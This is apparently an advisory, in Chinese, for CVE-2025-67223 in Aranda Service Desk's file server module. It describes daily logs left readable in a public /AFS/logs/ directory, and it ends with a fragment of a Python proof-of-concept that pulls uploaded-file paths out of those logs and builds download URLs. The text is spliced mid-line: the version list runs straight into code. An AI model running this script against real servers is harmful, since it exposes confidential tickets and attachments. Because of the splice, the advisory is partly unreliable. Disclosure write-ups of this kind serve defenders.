# CVE-2025-67223: Aranda Service Desk 访问控制错误与信息泄露 ## 漏洞概述 在 Aranda Service Desk (Aranda File Server - AFS 模块) 的文件管理模块中发现了一个关键漏洞。系统以可预测的名称(例如 `YYYYMMDD.log`)将每日活动日志存储在公共目录 (`/AFS/logs/`) 中,且没有任何访问限制。 **风险等级:关键** 该漏洞允许未经身份验证的远程攻击者以自动化的方式迭代并系统地下载 Aranda 的日志。核心问题在于这些日志文件暴露了系统上所有上传文件的虚拟路径,从而授予攻击者随意查看和导出支持工单、机密 Aranda 内部案例以及所有关联的敏感文件附件的能力。 ## 影响范围 * **受影响产品**: Aranda Service Desk (Aranda File Server - AFS 模块) * **受影响版本**: 1: path = "ServiceCalls/" + parts[1].split()[0] extracted_paths.append(path) elif "absolute file path" in line.lower(): # 提取绝对路径 parts = line.split("absolute file path: ") if len(parts) > 1: path = parts[1].strip() extracted_paths.append(path) # 3. 访问提取的路径 print(f"\n[+] 报告最终: {len(extracted_paths)} 个文件在范围内暴露") for path in extracted_paths: full_url = BASE_URL + path print(full_url) # 在此处添加下载逻辑 ```